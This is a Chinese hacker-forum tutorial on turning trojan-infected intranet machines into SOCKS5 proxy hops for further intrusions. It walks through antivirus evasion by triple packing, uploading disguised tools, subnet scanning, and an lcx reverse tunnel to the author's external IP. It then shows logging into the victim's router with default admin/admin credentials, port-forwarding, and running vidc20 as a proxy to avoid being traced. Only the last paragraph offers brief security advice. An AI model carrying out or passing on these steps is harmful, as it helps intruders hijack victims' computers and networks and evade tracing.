有人说内网中作SOCKS5服务器不可能,即使作成了也无法利用,好,今天我就将我的一些实践经验写出来与大家共享,没什么技术含量,大家交流一下,如果大家有更好的方法,还请不吝赐教哟!
话说在挂马得到大量肉鸡以后,众黑友可能都在想如何利用手中的这些战利品。有人喜欢偷窥人家的隐私,有的人可能就会用木马的键盘记录盗取人家的QQ密码,还有的人可能要盗取人家的宽带上网帐号充Q币。可大家有没有想到过将内网中的这些肉鸡作成SOCKS5服务器呢?这样的话,我们以后入侵就可以用这些肉鸡作跳板,黑人家也会安全的多了。有人说内网中作SOCKS5服务器不可能,即使作成了也无法利用,好,今天我就将我的一些实践经验写出来与大家共享,没什么技术含量,大家交流一下,如果大家有更好的方法,还请不吝赐教哟!
首先介绍一下使用的工具,lcx.exe 这是一个反向连接的内网端口映射工具,VIDC20.exe也是一个端口映射工具,不过它也有代理服务器的功能,支持http/socks4/socks5代理,支持代理验证,支持udp代理,支持二级代理;还有S扫描器,这个只有一个可执行文件,小巧方便,扫端口最合适了。这些工具在网上都有下载,在作代理服务之前,我们需要先作一下免杀,因为大部分杀毒软件是杀lcx.exe和S扫描器的,如果不作免杀,那一上传就可能被杀毒软件给杀掉,如图1:
图1
像这种强悍的卡巴,在命令行下是没有办法中止的,所以只能作免杀了,其他的杀毒软件在命令行下可以中止,不过需要一些技巧,因为它们都有线程保护,用常规的方法是中止不了的。我曾经在命令行下干掉过瑞星,只是方法比较繁琐,所以就不在这里演示了。至于免杀方法嘛,只要简单的加下壳就可以过关了,据我实验,先加个北斗3.5,再加aspack 2.12,之后再加北斗3.5,这样处理后绝大部分杀软件就不杀这两个程序了,呵呵。简单吧,杀毒软件也是会区别对待的,如果是一些流行木马,加这三重壳是不能免杀的,对于一些不太重要的黑客工具,杀毒软件就会显得相对宽松的多了。我们就是钻的杀毒软件的这个空子,如果是加了三重壳也过不了杀毒软件,那就不要怕麻烦将它们的特征码给修改掉,就可以过杀毒软件了,修改的方法网上有许多动画,大家可以自己找找,我的PCSHARE马就是这样作的,过卡巴,瑞星、江民、瑞星、金山、诺顿、趋势等杀毒软件很轻松,也可以轻松过各种查马工具,这就是我修改特征码后加了三重壳作成的,一个超强的工具。呵呵。有些跑题了,言归正传。
工具准备完备后,下面开始作代理了。首先打开你的木马客户端程序,将上面的这些工具上传到内网中的肉鸡上,就放在WINDOWS目录里吧,文件名嘛,最好改一下,免得引起对方注意。打开对方的命令符,键入命令:ipconfig /all查看一下肉鸡的IP地址,如:192.168.0.2,得到这个本机及网关的IP地址以后,我们就可以用S扫描器对同它同一网段的IP地址进行扫描,看这台肉鸡的网关是什么类型的。S扫描器相信大家都会用了吧。
命令行:s-jk tcp 192.168.0.1 192.168.0.255 80,23,3389,1433,139,445 20
这个s-jk是我加三重壳免杀后的S扫描器,这条命令在整个网段中扫描开放139 3389 1433 80 23端口的主机,呵呵,这是为渗透内部网络作准备,也许有很重要的信息出现呢。哈哈。扫描结果如下图2:
图2
经过扫描发现这台肉鸡的网关开放80号端口,这说明这台网关一定是台路由器。那怎样登录进它的路由器呢?大家都知道宽带路由器在外网中是不能登录的,只能由它的内部网络登录,难道要进肉鸡的屏幕控制,用肉鸡的IE登录?非也,这样很容易暴露,再说肉鸡上的管理员也许现在正在电脑前工作,你是根本没有办法进行控制的,下面在自己的电脑上打开命令提示符,命令:lcx -listen 21 8000 再回到肉鸡的CMD下,命令:lcx -slave 218.57.179.152 21 192.168.0.1 80 解释一下:218.57.179.152是我的外网IP,这样就将肉鸡的宽带路由器的80端口映射到了我的电脑的21端上了,我连接本机的8000端口就可以了。如图3:
图3
下一步就要打开IE,地址栏中键入:http://127.0.0.1:8000回车后,盼望已久的并且很熟悉的登录界面出现了。这正是宽带路由器的登录界面,只不过这不是我的宽带路由器,而是另一个局域网的宽带路由器,我熟练的键入的默认用户名及密码,admin admin,确定后成功登录了。如图4、图5。
图4
图5
接下来的工作简直就是轻车熟路了,设置一个虚拟服务器指向这台肉鸡,端口设置成了个陌生的端口,不要设置成8080,因为宽带路由器要使用这个端口,它是不允许设置成这个端口的,我设置的是2233,保存后,我们再回到肉鸡的命令行下,命令:vidc20 -d -p 2233 这个命令的意思就是以控制台的方式启动vidc20.exe这个程序,开2233服务端口提供代理服务。这台肉鸡已经开始提供SOCK5服务了,并且路由器上的映射也已经正常工作,我们要作的就是打开SOCK5客户端程序,设置一下SOCKS5服务器的IP地址及端口,也就是这台肉鸡的外网IP。我们将IE的图标拖到SocksCap32的图标上创建了一个新快捷方式,这样以后我们登录到ASP马时就可以双击SocksCap32中的IE进行登录了。如果你觉得不放心,可以登录ip.knowsky.com,查看一下IP,IP地址显示的是你的肉鸡的IP,使用这种代理比使用匿名的HTTP代理还要安全的多,因为给你提供代理的是台个人电脑,并且IP不固定,在一个局域网内部,没有一些监控软件记录任何的连接,并且这台个人电脑重启后vidc20.exe并不在运行,可以说是毫无痕迹,这样即使有人追查你的话,也只能查到你肉鸡的IP为止,再想继续追查就不太容易了。
有人说如果管理员把宽带路由器的密码改掉了,那不是没得玩了,我随机挑选了五个局域网进行测试,全部是默认口令,看来设置默认口令的概率还是满高的。我分析了一下原因:一、可能是宽带路由器只能由内网连接,管理员对其安全性认识不足。二、内网中的电脑用户都是菜鸟,不需要作安全设置。三、管理员懈怠,没把它当回事。说实话我的宽带路由器也是设置的默认口令,为什么没有改掉呢?我觉得我应该属于第二种情况吧,内网中全部是菜鸟用户,所以根本必要修改掉,这样就暴露了一个安全问题,一旦内网中的电脑中了木马,入侵者就有可能获得你的宽带帐号,用你的宽带帐号刷Q币、刷业务;还可能登录你的ISP将你的宽带帐号给修改掉,让你上不了网了。如果入侵者拿你作跳板,他作了坏事由你背黑锅,那岂不是更加冤枉。所以,大家一定对内网的安全问题提高警惕。该打的补丁打上,该修改的默认口令给修改掉,这样就可以抵御大多数初级的入侵者的攻击了。但要想绝对安全,那是不可能的,这个世界上没有绝对的安全。